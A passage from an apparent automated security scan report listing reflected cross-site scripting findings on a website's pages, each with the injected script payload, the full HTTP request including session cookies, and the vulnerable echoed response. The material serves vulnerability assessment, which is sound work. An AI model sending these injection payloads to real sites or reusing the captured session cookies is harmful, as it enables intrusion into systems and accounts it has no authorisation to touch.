P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en9656f"><script>alert(1)</script>8d1ba6a5b9a/feature/the-watchmouse-api.html" method="post">
...[SNIP]...

1.144. http://www.watchmouse.com/en/feature/the-watchmouse-api.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/the-watchmouse-api.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e5ce"><script>alert(1)</script>c0662cbc4e4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature5e5ce"><script>alert(1)</script>c0662cbc4e4/the-watchmouse-api.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-eb1c6aca7a7e8382fa9392c8d91402da"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature5e5ce"><script>alert(1)</script>c0662cbc4e4/the-watchmouse-api.html" method="post">
...[SNIP]...

1.145. http://www.watchmouse.com/en/feature/the-watchmouse-api.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/the-watchmouse-api.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da742"><script>alert(1)</script>c96b812039a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/the-watchmouse-api.htmlda742"><script>alert(1)</script>c96b812039a HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:13 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-90409673a44ca603b7eec973849dfdac"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature/the-watchmouse-api.htmlda742"><script>alert(1)</script>c96b812039a" method="post">
...[SNIP]...

1.146. http://www.watchmouse.com/en/feature/the-watchmouse-api.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/the-watchmouse-api.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45397"><script>alert(1)</script>f2e77e28a8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/the-watchmouse-api.html?45397"><script>alert(1)</script>f2e77e28a8c=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:02 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-b682dcf1b2a1b4f034e4e93bb4ad80ea"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23428

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="/en/feature/the-watchmouse-api.html?45397"><script>alert(1)</script>f2e77e28a8c=1" method="post">
...[SNIP]...

1.147. http://www.watchmouse.com/en/feature/tos.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/tos.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4912b"><script>alert(1)</script>ed30d7fc365 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en4912b"><script>alert(1)</script>ed30d7fc365/feature/tos.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:11 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-5672264136862882048b960f9860f4c1"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en4912b"><script>alert(1)</script>ed30d7fc365/feature/tos.php" method="post">
...[SNIP]...

1.148. http://www.watchmouse.com/en/feature/tos.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/tos.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 632e1"><script>alert(1)</script>a85a65403a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature632e1"><script>alert(1)</script>a85a65403a9/tos.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-765f31dc37df368d4db9a27995d4b6af"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature632e1"><script>alert(1)</script>a85a65403a9/tos.php" method="post">
...[SNIP]...

1.149. http://www.watchmouse.com/en/feature/tos.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/tos.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a912"><script>alert(1)</script>67e6b80b0c6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/tos.php9a912"><script>alert(1)</script>67e6b80b0c6 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:13 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-01969147216bc344f84c8cb1d76a0d81"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature/tos.php9a912"><script>alert(1)</script>67e6b80b0c6" method="post">
...[SNIP]...

1.150. http://www.watchmouse.com/en/feature/tos.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/tos.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50511"><script>alert(1)</script>92056369859 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/tos.php?50511"><script>alert(1)</script>92056369859=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:01 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-c20868fa7c3ff027b53824f9cbd16cf4"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature/tos.php?50511"><script>alert(1)</script>92056369859=1" method="post">
...[SNIP]...

1.151. http://www.watchmouse.com/en/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9980a"><script>alert(1)</script>0af79ea25a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en9980a"><script>alert(1)</script>0af79ea25a4/feature/transaction-monitoring-web-application-testing.html HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/register.php?vpackid=35
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.9.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:05:23 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-7dbefcaf852441a510cf571441445e18"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en9980a"><script>alert(1)</script>0af79ea25a4/feature/transaction-monitoring-web-application-testing.html" method="post">
...[SNIP]...

1.152. http://www.watchmouse.com/en/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99131"><script>alert(1)</script>26edbd2bf06 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature99131"><script>alert(1)</script>26edbd2bf06/transaction-monitoring-web-application-testing.html HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/register.php?vpackid=35
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.9.10.1297252772

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:21 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-0953ac9f5837ea38545a94c48b8321c2"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature99131"><script>alert(1)</script>26edbd2bf06/transaction-monitoring-web-application-testing.html" method="post">
...[SNIP]...

1.153. http://www.watchmouse.com/en/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26d70"><script>alert(1)</script>8c0caad865a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/transaction-monitoring-web-application-testing.html26d70"><script>alert(1)</script>8c0caad865a HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/register.php?vpackid=35
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.9.10.1297252772

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-f5a6ccccbf816257844868050b9a0d72"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature/transaction-monitoring-web-application-testing.html26d70"><script>alert(1)</script>8c0caad865a" method="post">
...[SNIP]...

1.154. http://www.watchmouse.com/en/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/transaction-monitoring-web-application-testing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5586b"><script>alert(1)</script>71fd46db455 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/transaction-monitoring-web-application-testing.html?5586b"><script>alert(1)</script>71fd46db455=1 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/register.php?vpackid=35
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.9.10.1297252772

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:05:03 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-fb1d3d61ca5076032bc2711df8f98740"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 24038

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="/en/feature/transaction-monitoring-web-application-testing.html?5586b"><script>alert(1)</script>71fd46db455=1" method="post">
...[SNIP]...

1.155. http://www.watchmouse.com/en/feed.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feed.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df462"><script>alert(1)</script>7db7836a50e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /endf462"><script>alert(1)</script>7db7836a50e/feed.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-2d36c6d3101076669f36db6c9995c73f"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/endf462"><script>alert(1)</script>7db7836a50e/feed.php" method="post">
...[SNIP]...

1.156. http://www.watchmouse.com/en/feed.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feed.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff9ba"><script>alert(1)</script>ed691d874bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feed.phpff9ba"><script>alert(1)</script>ed691d874bf HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:36 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-d4a3b78a867db56c33a3b3cdbed332e6"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feed.phpff9ba"><script>alert(1)</script>ed691d874bf" method="post">
...[SNIP]...

1.157. http://www.watchmouse.com/en/feed.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.watchmouse.com
Path:   /en/feed.php

Issue detail

